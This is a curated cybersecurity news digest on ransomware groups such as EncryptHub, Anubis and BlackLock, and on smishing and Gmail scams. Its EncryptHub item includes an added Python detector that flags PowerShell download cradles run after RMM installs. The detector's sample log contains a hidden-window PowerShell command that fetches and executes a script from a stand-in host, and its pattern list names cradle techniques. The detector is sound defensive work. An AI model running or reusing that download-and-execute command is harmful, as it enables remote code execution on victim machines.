Ransomware/Malware
EncryptHub Breaches Hundreds of Organizations to Deploy Infostealers, Ransomware
EncryptHub, also tracked as Larva-208, is a threat actor that has targeted organizations worldwide with spear-phishing and social-engineering campaigns since June 2024. Impersonating IT support, the group combines SMS phishing (smishing) and voice phishing (vishing) with fake login pages for popular corporate VPN products to harvest credentials and multi-factor authentication tokens. Once inside, it installs Remote Monitoring and Management (RMM) software to retain remote access, then runs PowerShell scripts that fetch and install infostealers such as Stealc and Rhadamanthys, as well as a custom ransomware encryptor. EncryptHub has compromised at least 618 organizations, stealing cryptocurrency wallets, VPN credentials, and password-manager data among other sensitive information. The group has operated as an affiliate of the RansomHub and BlackSuit ransomware operations and tailors each intrusion to evade detection and maximise the value of the breach.
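The chain described above (RMM agent installed, then PowerShell used to pull down the stealers) is a sequence a detection engineer can look for in endpoint telemetry. The following is an added example, not code from the original article or from any vendor it cites: it parses a handful of constructed, Sysmon-style process-creation lines and raises an alert when a suspicious PowerShell launch follows an RMM installer on the same host within a time window. The RMM executable names, the log format, the host names and the 203.0.113.10 address are all assumptions made for the example; the page does not name the RMM product EncryptHub used.

```python
"""Detect 'RMM install followed by PowerShell download cradle' on one host.

Added example. Log format, RMM names and sample events are constructed for
illustration and are not real telemetry or indicators from the article.
"""
import re
from datetime import datetime, timedelta

# ASSUMPTION: common RMM agent/installer names. Tune to what is *not* sanctioned
# in your environment; legitimately used RMM tools belong on an allowlist.
RMM_IMAGES = {
    "anydesk.exe", "screenconnect.clientsetup.exe", "teamviewer_setup.exe",
    "ateraagent.exe", "splashtop_streamer.exe",
}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of a PowerShell download cradle / hidden launch.
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"(?:^|\s)-e(?:nc|ncodedcommand)?(?:\s|$)",   # -e / -enc / -EncodedCommand
    r"downloadstring|downloadfile",                # Net.WebClient cradles
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b",
    r"\biex\b|invoke-expression",
    r"(?:^|\s)-w(?:indowstyle)?\s+hidden",         # hidden window
    r"frombase64string",
)]

# Constructed sample events: "<ISO8601 ts> key=value key="quoted value" ..."
SAMPLE_LOG = [
    r'2025-02-20T09:55:03Z host=WS-FIN-07 user=j.doe image=C:\Windows\System32\svchost.exe cmdline="svchost.exe -k netsvcs"',
    r'2025-02-20T10:02:11Z host=WS-FIN-07 user=j.doe image=C:\Users\j.doe\Downloads\AnyDesk.exe cmdline="AnyDesk.exe --install C:\ProgramData\AnyDesk --silent"',
    r'2025-02-20T10:09:47Z host=WS-FIN-07 user=j.doe image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(\'http://203.0.113.10/up.ps1\')"',
    r'2025-02-20T11:30:00Z host=WS-HR-02 user=a.smith image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"',
    r'2025-02-20T13:00:00Z host=WS-HR-02 user=a.smith image="C:\Program Files\ScreenConnect\ScreenConnect.ClientSetup.exe" cmdline="ScreenConnect.ClientSetup.exe /silent"',
    r'2025-02-20T15:30:00Z host=WS-HR-02 user=a.smith image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
]

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one constructed log line into a dict with a datetime 'ts'."""
    ts_str, _, rest = line.partition(" ")
    ev = {"ts": datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ")}
    for key, quoted, bare in KV_RE.findall(rest):
        ev[key] = quoted if quoted else bare
    return ev


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_rmm_install(ev: dict) -> bool:
    return _basename(ev.get("image", "")) in RMM_IMAGES


def is_suspicious_powershell(ev: dict) -> bool:
    """PowerShell launched with cradle/hidden-window/encoded-command traits."""
    if _basename(ev.get("image", "")) not in POWERSHELL_IMAGES:
        return False
    cmd = ev.get("cmdline", "")
    return any(p.search(cmd) for p in CRADLE_PATTERNS)


def detect(lines, window: timedelta = timedelta(hours=1)) -> list:
    """Return one alert per suspicious PowerShell launch that follows an RMM
    install on the same host within `window`. Events are sorted by time first."""
    events = sorted((parse_event(l) for l in lines if l.strip()), key=lambda e: e["ts"])
    last_rmm = {}   # host -> most recent RMM install event seen
    alerts = []
    for ev in events:
        host = ev.get("host")
        if is_rmm_install(ev):
            last_rmm[host] = ev
        elif is_suspicious_powershell(ev):
            prior = last_rmm.get(host)
            if prior is not None and ev["ts"] - prior["ts"] <= window:
                alerts.append({
                    "host": host,
                    "user": ev.get("user"),
                    "rmm": prior.get("image"),
                    "cmdline": ev.get("cmdline"),
                    "delta_min": int((ev["ts"] - prior["ts"]).total_seconds() // 60),
                })
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"ALERT {a['host']} ({a['user']}): {a['rmm']} then PowerShell "
              f"{a['delta_min']} min later: {a['cmdline']}")
```

Run against the constructed log, only WS-FIN-07 alerts: the AnyDesk install is followed seven minutes later by a hidden-window download cradle. WS-HR-02 does not, because the benign scripted PowerShell carries no cradle traits and the encoded command there arrives two and a half hours after the ScreenConnect setup, outside the one-hour window. In a real deployment, key the correlation on host plus user, tune the window to observed dwell times, and allowlist RMM tools your own IT team deploys so the rule only fires on unsanctioned agents.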
New Report Shows Global Ransomware Crisis Worsened in 2024, Urging Stronger Cybersecurity Measures
BlackFog’s “2024 State of Ransomware Report” reveals that ransomware attacks reached unprecedented levels in 2024, with a 25% increase in disclosed incidents and a 26% rise in undisclosed ones compared to the previous year. This surge was driven by new ransomware variants and groups, including the prominent LockBit and the newcomer RansomHub, which caused significant damage to sectors such as healthcare, government, and manufacturing. The report highlights the growing threat to critical infrastructure, with attackers increasingly using data exfiltration tactics and extortion methods alongside encryption. Despite efforts by governments and organizations to combat these threats, ransomware continues to evolve, with the emergence of AI-driven attacks and ransomware-as-a-service (RaaS) models complicating defenses.
The Rise of the New Nascent Anubis RaaS Operation
The newly emerged Anubis ransomware-as-a-service (RaaS) operation, identified late last year, is poised to become a significant threat with its expansive affiliate programs. These include options for traditional ransomware attacks, stolen data monetization, and revenue-sharing with brokers. Anubis has shown a preference for data extortion over encryption in its attacks, though it still maintains the ability to encrypt files. Anubis’s operators are suspected to be experienced individuals, possibly former affiliates of other ransomware groups, contributing to the group’s growing menace.
The Rising BlackLock Ransomware Problem
Although it surfaced only last March, the BlackLock ransomware-as-a-service (RaaS) group has quickly become one of the most prolific, ranking as the seventh most active ransomware gang after a 1,425% surge in activity between October and December. BlackLock targets Windows, VMware ESXi, and Linux systems with double-extortion tactics, using its own purpose-built malware and a custom leak site that pressures victims into paying immediately while hindering their ability to assess what was taken. The group recruits affiliates and traffers (operators who funnel victim traffic to the malware) through the Russian-language cybercrime forum RAMP, prioritizing speed over operational security when onboarding these entry-level roles, while taking a more cautious approach to higher-level roles such as programmers.
Phishing/Scams
Toll Scams Are Targeting Texas Drivers
The Texas Department of Transportation (TxDOT) is warning residents about an ongoing toll scam targeting drivers. Fraudulent text messages, a technique known as "smishing," claim that recipients have overdue toll balances. TxDOT assures customers that it never sends overdue-balance reminders by text, and that any legitimate TxTag text message comes only from the short code 22498. Anyone who has fallen for the scam should contact TxTag customer service directly and report the incident to the FBI's Internet Crime Complaint Center. The public is advised to treat such messages with caution and to verify any claimed balance by logging into their TxTag account or contacting customer service, rather than following links in the message.
Phishing Scam Targets Facebook Users
Meta has issued a warning about a phishing scam targeting Facebook users, where scammers send fake text messages falsely alleging violations of trademark rules. These messages aim to deceive recipients into revealing personal information. Users are advised to remain vigilant and avoid engaging with unsolicited communications that request sensitive data.
Alert Issued to All Gmail Users
Gmail users have been warned about a growing scam that uses artificial intelligence to create convincing voice and video messages designed to steal money and personal information. These phishing attacks begin with a call claiming that the target's Gmail account has been compromised, followed by a legitimate-looking email that appears to come from Google and asks for the account's recovery code. Victims who hand over the code not only lose access to their Gmail account but also risk identity theft and the loss of sensitive data. Experts from Malwarebytes advise users to be cautious about unsolicited communications, avoid clicking on suspicious links, and verify any security alert directly through trusted channels rather than through the caller or the email. The FBI has also issued warnings about the rise of such AI-driven scams.
_______
Content curated by the team of COMPUTER 2000 on the basis of news in reputable media and marketing materials provided by our partners, companies, and other vendors.